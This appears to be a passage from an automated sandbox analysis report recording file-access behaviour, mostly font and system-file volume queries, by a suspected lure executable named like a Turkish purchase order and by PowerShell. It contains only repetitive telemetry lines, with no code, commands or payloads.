Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
